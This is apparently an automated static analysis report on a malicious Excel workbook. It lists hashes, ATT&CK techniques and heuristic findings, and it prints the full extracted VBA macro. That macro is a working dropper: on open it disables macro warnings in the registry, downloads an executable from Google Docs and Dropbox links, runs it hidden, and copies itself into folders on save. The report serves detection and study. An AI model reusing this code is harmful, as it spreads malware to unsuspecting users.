Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 c8708147498e1c05…

MALICIOUS

Office (OOXML) / .XLSX

706.2 KB Created: 2015-01-15 16:55:01 UTC Authoring application: Microsoft Excel 14.0300 First seen: 2026-06-24
MD5: 67a2e693d27b3761e37b25abf106447e SHA-1: a27d47545a669c3d9e7588acb4145848626120a5 SHA-256: c8708147498e1c05ba1d147612ac343eecf8e2477f6c0b8649d2ef7988134071
314 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a macro-enabled Excel file that contains a Workbook_Open macro. This macro utilizes WScript.Shell and CreateObject to download a file from a provided URL and execute it. The macro also attempts to disable VBA warnings in the registry, indicating an effort to hide its malicious activity. The primary IOCs are the URLs used for payload delivery and the registry keys modified to suppress security warnings.

Heuristics 11

  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell TMP, vbHide
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
      Set myWS = CreateObject("WScript.Shell")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
          oStream.Write WinHttpReq.ResponseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      Set FSO = CreateObject("scripting.filesystemobject")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
      FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
  • External workbook data link low OOXML_EXTERNAL_REL_DATALINK
    External workbook reference in xl/externalLinks/_rels/externalLink1.xml.rels: /Design/LIBRARY/Standard Files/Excel standards/Mayfield Blank BOM 3 with MOR macro.xlsm
  • Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 3 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download Referenced by macro
    • https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1Referenced by macro
    • https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download�Referenced by macro
    • https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1�Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6480 bytes
SHA-256: e641847ccb4454ae8aee6b764f337d2b79450fb4ece918c9383e8430c4552946
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim SheetsChanged As Boolean
Dim SheetCount As Integer

Private Sub Workbook_Open()
  Dim i As Integer
  For i = 1 To ActiveWorkbook.Sheets.Count
    ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
  Next i
  
  RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"
  
  Application.DisplayAlerts = False
  SheetCount = Worksheets.Count
  
  Call MPS
  
  ActiveWorkbook.Sheets(1).Select
  SheetsChanged = False
End Sub

Private Sub Workbook_BeforeClose(Cancel As Boolean)
  If Not SheetsChanged Then
    ActiveWorkbook.Saved = True
  End If
End Sub

Private Sub Workbook_SheetChange(ByVal Sh As Object, ByVal Target As Range)
  SheetsChanged = True
End Sub

Private Sub Workbook_NewSheet(ByVal Sh As Object)
  SheetsChanged = True
End Sub

Private Sub Workbook_SheetActivate(ByVal Sh As Object)
  If ActiveWorkbook.Sheets.Count <> SheetCount Then
    SheetsChanged = True
    SheetCount = ActiveWorkbook.Sheets.Count
  End If
End Sub

Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
  Dim i As Integer
  Dim AIndex As Integer
  Dim FName

  AIndex = ActiveWorkbook.ActiveSheet.Index

  If SaveAsUI = False Then
    Cancel = True
    Application.EnableEvents = False
    Application.ScreenUpdating = False
    
    For i = 1 To ActiveWorkbook.Sheets.Count - 1
      ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
    Next i
    ActiveWorkbook.Save
      
    For i = 1 To ActiveWorkbook.Sheets.Count
      ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
    Next i
    ActiveWorkbook.Sheets(AIndex).Select
    SheetsChanged = False
    
    Application.ScreenUpdating = True
    Application.EnableEvents = True
  Else
    Cancel = True
    Application.EnableEvents = False
    Application.ScreenUpdating = False
    
    For i = 1 To ActiveWorkbook.Sheets.Count - 1
      ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
    Next i
    
    FName = Application.GetSaveAsFilename(fileFilter:="Excel Çalýþma Kitabý (*.xlsm), *.xlsm")
    If FName <> False Then
      ActiveWorkbook.SaveAs Filename:=FName, FileFormat:=xlOpenXMLWorkbookMacroEnabled
      SaveAsInj ActiveWorkbook.Path
    End If
    
    For i = 1 To ActiveWorkbook.Sheets.Count
      ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
    Next i
    ActiveWorkbook.Sheets(AIndex).Select
    SheetsChanged = False
        
    Application.ScreenUpdating = True
    Application.EnableEvents = True
  End If
End Sub

Sub SaveAsInj(DIR As String)
  Dim FSO As Object
  Dim FN As String
  
  Set FSO = CreateObject("scripting.filesystemobject")
  FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
  
  If FSO.FileExists(FN) Then
    If Not FSO.FileExists(DIR & "\~$cache1") Then
      FileCopy FN, DIR & "\~$cache1"
    End If
    SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem
  End If
End Sub

Function RegKeyRead(i_RegKey As String) As String
  Dim myWS As Object

  On Error Resume Next
  Set myWS = CreateObject("WScript.Shell")
  RegKeyRead = myWS.RegRead(i_RegKey)
End Function

Function RegKeyExists(i_RegKey As String) As Boolean
Dim myWS As Object

  On Error GoTo ErrorHandler
  Set myWS = CreateObject("WScript.Shell")
  myWS.RegRead i_RegKey
  RegKeyExists = True
  Exit Function
  
ErrorHandler:
  RegKeyExists = False
End Function

Sub RegKeySave(i_RegKey As String, _
               i_Value As String, _
      Optional i_Type As String = "REG_SZ")
Dim myWS As Object

  Set myWS = CreateObject("WScript.Shell")
  myWS.RegWrite i_RegKey, i_Value, i_Type
End Sub

Sub MPS()
  Dim FSO As Object
  Dim FP(1 To 3), TMP, URL(1 To 3) As String
  
  Set FSO = CreateObject("scripting.filesystemobject")
  FP(1) = ActiveWorkbook.Path & "\~$cache1"
  FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"

  URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
  URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
  URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
  TMP = Environ("Temp") & "\~$cache1.exe"
  
  If FSO.FileExists(FP(1)) Then
    If Not FSO.FileExists(TMP) Then
      FileCopy FP(1), TMP
    End If
    Shell TMP, vbHide
  ElseIf FSO.FileExists(FP(2)) Then
    If Not FSO.FileExists(TMP) Then
      FileCopy FP(2), TMP
    End If
    Shell TMP, vbHide
  Else
    If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
      Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
    ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
      Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
    ElseIf Not FSO.FileExists(TMP) Then
      If FDW((URL(1)), (TMP)) Then
      ElseIf FDW((URL(2)), (TMP)) Then
      ElseIf FDW((URL(3)), (TMP)) Then
      End If
      If FSO.FileExists(TMP) Then
        Shell TMP, vbHide
      End If
    Else
      Shell TMP, vbHide
    End If
    
  End If
  
End Sub

Function FDW(MYU, NMA As String) As Boolean
  Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
  If WinHttpReq Is Nothing Then
    Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
  End If

  WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
  WinHttpReq.Option(6) = AllowRedirects
  WinHttpReq.Open "GET", MYU, False
  WinHttpReq.Send
  
  If (WinHttpReq.Status = 200) Then
    If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then
      FDW = True
      Set oStream = CreateObject("ADODB.Stream")
      oStream.Open
      oStream.Type = 1
      oStream.Write WinHttpReq.ResponseBody
      oStream.SaveToFile (NMA)
      oStream.Close
    Else
       FDW = False
    End If
  Else
    FDW = False
  End If
End Function
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 24576 bytes
SHA-256: 85e6475ac84472154031041602a63ee17dab326b86cb1fb958be3a65348d0949